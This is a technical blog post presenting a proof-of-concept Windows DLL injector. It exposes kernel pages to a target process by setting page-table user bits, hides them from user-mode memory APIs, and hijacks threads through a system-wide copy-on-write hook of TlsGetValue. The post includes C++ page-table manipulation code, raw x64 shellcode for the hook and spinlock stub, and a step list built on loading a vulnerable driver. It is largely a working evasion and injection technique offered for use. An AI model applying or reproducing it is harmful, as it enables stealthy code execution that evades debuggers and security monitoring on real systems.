Making the Perfect Injector: Abusing Windows Address Sanitization and CoW
By the end of this post, I aim to build an injector unlike any other: one that, by design, makes your DLL undebuggable from user mode (UM), makes your pages invisible to NtQueryVirtualMemory and NtReadVirtualMemory, and lets you execute code in the target process without holding a valid handle to it at all. While doing this, I also want it to be compatible with PatchGuard and to have no kernel driver loaded while the target is running.
Now, this may seem like a stupidly complicated goal; however, it is in fact really simple, because Windows will be helping us.
(Source code can be found at the bottom)
0x1: Abusing Windows Address Sanitization
Anyone who has opened ntoskrnl.exe in IDA probably noticed these checks:
1__int64 __usercall MiReadWriteVirtualMemory@<rax>(ULONG_PTR BugCheckParameter1@<rcx>, unsigned __int64 a2@<rdx>, unsigned __int64 a3@<r8>, __int64 a4@<r9>, __int64 a5, int a6)
2{
3 ...
4 if ( v10 < a3 || v9 > 0x7FFFFFFEFFFFi64 || v10 > 0x7FFFFFFEFFFFi64 )
5 return 0xC0000005i64;
6 ...
7}
8__int64 __fastcall MmQueryVirtualMemory(__int64 a1, unsigned __int64 a2, __int64 a3, unsigned __int64 a4, unsigned __int64 a5, unsigned __int64 *a6)
9{
10 ...
11 if ( v12 > 0x7FFFFFFEFFFFi64 )
12 return 0xC000000Di64;
13 ...
14}
Okay, so what is so interesting about these, you might be asking right now? 0x7FFFFFFEFFFF marks the end of user-mode memory, so the checks are obviously there to make sure kernel memory is not leaked to user mode.
Here’s what makes them so interesting: these constants are hard-coded by the operating system and are NOT what the processor actually uses to decide whether a page is accessible from CPL3 or not.
In case you are not familiar with page tables, here’s how virtual memory works:
The first 12 bits (&0xFFF) of a virtual address indicate the offset within the resolved page; the next four 9-bit groups (&0x1FF000, &0x3FE00000, &0x7FC0000000, &0xFF8000000000) indicate the index of the entry in the page table, page directory, page directory pointer table and page map level 4, respectively. Apart from linking to the next lower level, these entries also contain certain flags such as write disable, execute disable, etc., as you can see from the definitions below.
1#pragma pack(push, 1)
2typedef union CR3_ // 64-bit view of a CR3 value; bit ranges below assume bit-fields are allocated from bit 0 upward (as MSVC/x64 does).
3{
4 uint64_t value; // raw 64-bit value overlaying the bit-fields below
5 struct
6 {
7 uint64_t ignored_1 : 3; // bits 0-2
8 uint64_t write_through : 1; // bit 3
9 uint64_t cache_disable : 1; // bit 4
10 uint64_t ignored_2 : 7; // bits 5-11
11 uint64_t pml4_p : 40; // bits 12-51; presumably the page frame number of the PML4 table - TODO confirm against the Intel SDM
12 uint64_t reserved : 12; // bits 52-63
13 };
14} PTE_CR3; // NOTE(review): the typedef name is PTE_CR3 while the union tag is CR3_
15
16typedef union VIRT_ADDR_ // Splits a 64-bit virtual address into its page offset and four 9-bit paging-structure indices.
17{
18 uint64_t value; // the address as an integer
19 void *pointer; // the same address as a pointer
20 struct
21 {
22 uint64_t offset : 12; // mask 0xFFF: byte offset within the resolved page
23 uint64_t pt_index : 9; // mask 0x1FF000: index into the page table
24 uint64_t pd_index : 9; // mask 0x3FE00000: index into the page directory
25 uint64_t pdpt_index : 9; // mask 0x7FC0000000: index into the page directory pointer table
26 uint64_t pml4_index : 9; // mask 0xFF8000000000: index into the page map level 4
27 uint64_t reserved : 16; // upper 16 bits, not used as an index
28 };
29} VIRT_ADDR;
30
31typedef uint64_t PHYS_ADDR;
32
33typedef union PML4E_ // One page-map-level-4 entry; bit ranges below assume bit-fields are allocated from bit 0 upward (as MSVC/x64 does).
34{
35 uint64_t value; // raw 64-bit entry overlaying the bit-fields below
36 struct
37 {
38 uint64_t present : 1; // bit 0
39 uint64_t rw : 1; // bit 1; presumably read/write permission - TODO confirm against the Intel SDM
40 uint64_t user : 1; // bit 2; user/supervisor flag: decides whether the region is accessible from user mode
41 uint64_t write_through : 1; // bit 3
42 uint64_t cache_disable : 1; // bit 4
43 uint64_t accessed : 1; // bit 5
44 uint64_t ignored_1 : 1; // bit 6
45 uint64_t reserved_1 : 1; // bit 7
46 uint64_t ignored_2 : 4; // bits 8-11
47 uint64_t pdpt_p : 40; // bits 12-51; link to the next lower level (presumably the PDPT's page frame number)
48 uint64_t ignored_3 : 11; // bits 52-62
49 uint64_t xd : 1; // bit 63; presumably the execute-disable flag
50 };
51} PML4E;
52
53typedef union PDPTE_ // One page-directory-pointer-table entry; bit ranges below assume bit-fields are allocated from bit 0 upward (as MSVC/x64 does).
54{
55 uint64_t value; // raw 64-bit entry overlaying the bit-fields below
56 struct
57 {
58 uint64_t present : 1; // bit 0
59 uint64_t rw : 1; // bit 1; presumably read/write permission - TODO confirm against the Intel SDM
60 uint64_t user : 1; // bit 2; user/supervisor flag: decides whether the region is accessible from user mode
61 uint64_t write_through : 1; // bit 3
62 uint64_t cache_disable : 1; // bit 4
63 uint64_t accessed : 1; // bit 5
64 uint64_t dirty : 1; // bit 6
65 uint64_t page_size : 1; // bit 7; presumably set when this entry maps a large page directly - TODO confirm
66 uint64_t ignored_2 : 4; // bits 8-11
67 uint64_t pd_p : 40; // bits 12-51; link to the next lower level (presumably the page directory's page frame number)
68 uint64_t ignored_3 : 11; // bits 52-62
69 uint64_t xd : 1; // bit 63; presumably the execute-disable flag
70 };
71} PDPTE;
72
73typedef union PDE_ // One page-directory entry; bit ranges below assume bit-fields are allocated from bit 0 upward (as MSVC/x64 does).
74{
75 uint64_t value; // raw 64-bit entry overlaying the bit-fields below
76 struct
77 {
78 uint64_t present : 1; // bit 0
79 uint64_t rw : 1; // bit 1; presumably read/write permission - TODO confirm against the Intel SDM
80 uint64_t user : 1; // bit 2; user/supervisor flag: decides whether the region is accessible from user mode
81 uint64_t write_through : 1; // bit 3
82 uint64_t cache_disable : 1; // bit 4
83 uint64_t accessed : 1; // bit 5
84 uint64_t dirty : 1; // bit 6
85 uint64_t page_size : 1; // bit 7; presumably set when this entry maps a large page directly - TODO confirm
86 uint64_t ignored_2 : 4; // bits 8-11
87 uint64_t pt_p : 40; // bits 12-51; link to the next lower level (presumably the page table's page frame number)
88 uint64_t ignored_3 : 11; // bits 52-62
89 uint64_t xd : 1; // bit 63; presumably the execute-disable flag
90 };
91} PDE;
92
93typedef union PTE_ // One page-table entry; bit ranges below assume bit-fields are allocated from bit 0 upward (as MSVC/x64 does).
94{
95 uint64_t value; // raw 64-bit entry overlaying the bit-fields below
96 VIRT_ADDR vaddr; // the same 64 bits viewed as a VIRT_ADDR; NOTE(review): the intended use is not visible in this listing
97 struct
98 {
99 uint64_t present : 1; // bit 0
100 uint64_t rw : 1; // bit 1; presumably read/write permission - TODO confirm against the Intel SDM
101 uint64_t user : 1; // bit 2; user/supervisor flag: decides whether the page is accessible from user mode
102 uint64_t write_through : 1; // bit 3
103 uint64_t cache_disable : 1; // bit 4
104 uint64_t accessed : 1; // bit 5
105 uint64_t dirty : 1; // bit 6
106 uint64_t pat : 1; // bit 7
107 uint64_t global : 1; // bit 8
108 uint64_t ignored_1 : 3; // bits 9-11
109 uint64_t page_frame : 40; // bits 12-51; page frame number (PFN) of the mapped physical page
110 uint64_t ignored_3 : 11; // bits 52-62
111 uint64_t xd : 1; // bit 63; presumably the execute-disable flag
112 };
113} PTE;
114#pragma pack(pop)
The flag that interests us is .user: the user/supervisor flag decides whether a memory region is accessible from user mode. So, contrary to what people tend to think, the microcode for these checks would be something like this:
1Pte->user & Pde->user & Pdpte->user & Pml4e->user
instead of
1Va >= 0xFFFFFFFF80000000
Doesn’t this sound abusable to you? Because it definitely is. In our case, we will be using it to create a page that is invisible to all user-mode APIs, which is as simple as:
1// Sets the `user` bit on every paging level that maps [Memory, Memory + Size)
2// while the controller is attached to EProcess.
3//
4// Mc       - memory controller used to attach to the process and query page-table entries.
5// Memory   - start of the virtual range to expose.
6// Size     - length of the range in bytes.
7// EProcess - value passed to Mc.AttachTo() to select the target process.
8//
9// Returns TRUE when every visited page was updated, FALSE when any page had a
10// missing paging-structure entry or a PTE that is not present.
11BOOL ExposeKernelMemoryToProcess( MemoryController& Mc, PVOID Memory, SIZE_T Size, uint64_t EProcess )
12{
13 Mc.AttachTo( EProcess );
14
15 BOOL Success = TRUE;
16
17 Mc.IterPhysRegion( Memory, Size, [ & ] ( PVOID Va, uint64_t Pa, SIZE_T Sz )
18 {
19  auto Info = Mc.QueryPageTableInfo( Va );
20
21  // Check the upper levels BEFORE dereferencing them; the previous version
22  // wrote through Info.Pde and only afterwards tested it for null.
23  if ( !Info.Pml4e || !Info.Pdpte || !Info.Pde )
24  {
25   Success = FALSE;
26   return;
27  }
28
29  Info.Pml4e->user = TRUE;
30  Info.Pdpte->user = TRUE;
31  Info.Pde->user = TRUE;
32
33  // A null Pte is tolerated, as before (presumably the PDE maps a large page - TODO confirm).
34  if ( Info.Pte )
35  {
36   if ( !Info.Pte->present )
37    Success = FALSE; // was `TRUE`, which made failure impossible to report
38   else
39    Info.Pte->user = TRUE;
40  }
41 } );
42
43 Mc.Detach();
44
45 return Success;
46}
47// Usage: the range is exposed to Controller.CurrentEProcess and then zeroed directly.
48PVOID Memory = AllocateKernelMemory( CpCtx, KrCtx, Size );
49ExposeKernelMemoryToProcess( Controller, Memory, Size, Controller.CurrentEProcess );
50ZeroMemory( Memory, Size );
Voila, now we have our super-secret page. (I am using a wrapper I made for physical memory access before so if you want to see how the linear translation or the resolving of page table entries are implemented you can check that out.)
0x2: Abusing Copy-on-Write
Now that we are done with hiding the memory, all that is left to do is actually execute it and to do that we will be abusing Copy-on-Write this time.
CoW is a technique used by operating systems to save memory by making processes share certain physical memory regions until they actually get edited.
We know that ntdll.dll gets loaded for every process and its code (.text) region is rarely modified if at all, so why allocate physical memory for it again and again for hundreds of processes? That is exactly why modern operating systems use the technique called CoW.
The implementation is very simple:
- When a PE file gets mapped, if it was mapped to some other process too and its VA is free on the current process as well, simply copy the PFN and set the flag to make it read-only.
- When a PageFault occurs due to an instruction trying to write on the page, allocate new physical memory, set the PFN of the PTE and remove the read-only flag.
This means that when we hook the DLL by using physical memory we actually end up creating a system-wide hook.
How can we hijack a thread with this?
Well, let’s pick a commonly called function and hook it: TlsGetValue.
Now, the PML4E changes from process to process, so the kernel memory we exposed is not accessible from all processes; we therefore need to find some padding in KERNEL32.dll where we can check the pid before jumping to our stub in our lovely kernel page.
The pid check will be very simple:
1std::vector<BYTE> PidBasedHook = // 35 bytes of x64 machine code: compare the current pid with the target and, on a match, jump to the stub
2{
3 0x65, 0x48, 0x8B, 0x04, 0x25, 0x30, 0x00, 0x00, 0x00, // mov rax, gs:[0x30]      ; base pointer used for the pid load below (presumably the TEB - TODO confirm)
4 0x8B, 0x40, 0x40, // mov eax, [rax+0x40]     ; eax = current pid
5 0x3D, 0xDD, 0xCC, 0xAB, 0x0A, // cmp eax, TargetPid      ; imm32 here is a placeholder (0x0AABCCDD), presumably patched before use
6 0x0F, 0x85, 0x00, 0x00, 0x00, 0x00, // jne rel32               ; pid mismatch: branch away; displacement is zero here, presumably patched before use
7 0x48, 0xB8, 0xAA, 0xEE, 0xDD, 0xCC, 0xBB, 0xAA, 0x00, 0x00, // mov rax, KernelMemory   ; imm64 here is a placeholder (0xAABBCCDDEEAA)
8 0xFF, 0xE0 // jmp rax                 ; pid match: continue at the address loaded above
9};
As PE regions are always 0x1000 aligned, finding a 35-byte padding will be a piece of cake, as long as we look for 0x00 (page padding) and not 0xCC/0x90 (intra-function padding).
In the execution stub, we will have to do some tricks as well. We only want one thread to execute our code, and we want to unhook TlsGetValue before we continue execution. I also noticed that changes made through physical memory sometimes did not take effect immediately on the instructions being executed, so we want to make sure they have been applied. To cover all of this, we will implement three checks at the beginning of the stub.
1std::vector<BYTE> Prologue =
2{
3 0x00, 0x00, // data
4 0xF0, 0xFE, 0x05, 0xF8, 0xFF, 0xFF, 0xFF, // lock inc byte ptr [rip-n]
5 // wait_lock:
6 0x80, 0x3D, 0xF0, 0xFF, 0xFF, 0xFF, 0x00, // cmp byte ptr [rip-m], 0x0
7 0xF3, 0x90, // pause
8 0x74, 0xF5, // je wait_lock
9
10 0x48, 0xB8, 0xAA, 0xEE, 0xDD, 0xCC, 0xBB, 0xAA, 0x00, 0x00, // mov rax, 0xAABBCCDDEEAA
11 // data_sync_lock:
12 0x0F, 0x0D, 0x08, // prefetchw [rax]
13 0x81, 0x38, 0xDD, 0xCC, 0xBB, 0xAA, // cmp dword ptr[rax], 0xAABBCCDD
14 0xF3, 0x90, // pause
15 0x75, 0xF3, // jne data_sync_lock
16
17 0xF0, 0xFE, 0x0D, 0xCF, 0xFF, 0xFF, 0xFF, // lock dec byte ptr [rip-n]
18 0x75, 0x41, // jnz continue_exec
19 0x53, // --- start executing DllMain ---
The first spinlock, wait_lock, makes sure the threads entering this stub stall until our injector lets them continue. The second spinlock, data_sync_lock, makes sure the original TlsGetValue bytes have been written back before execution continues. The final atomic instruction, lock dec, is the counterpart of the lock inc at the beginning of the stub: lock inc recorded the number of threads waiting in the spinlock, and lock dec atomically decrements this count. When the count hits zero, the zero flag is set; because the operation is atomic, this happens exactly once, so we check the zero flag to decide whether this thread executes DllMain or simply continues execution.
Now that we have all tricks set-up, the implementation of the actual injector is very simple:
- Load vulnerable driver
- Map physical memory to user-mode
- Search for certain offsets (UniqueProcessId, DirectoryTableBase, ActiveProcessLinks)
- Save current EProcess and CR3 values for user-mode use
- Allocate enough kernel pool memory for our injector stub and image
- Unload vulnerable driver
- Map our image to the kernel memory (Fix .relocs and create a stub that gets the imports for us as I cannot bother reading EProcess->Peb)
- Wait for target process
- Expose the kernel page to target process
- Hook TlsGetValue system-wide and make it check for pid before jumping to our stub at kernel memory
- Wait for Stub->SpinningThreadCount to be non zero
- Unhook TlsGetValue, set Stub->Free = TRUE
- Profit.
Source code: https://github.com/can1357/ThePerfectInjector
Forgive me for the hasty image mapping implementation, and the debug code left if there is any. This is meant to be a PoC rather than a ready to go pasta.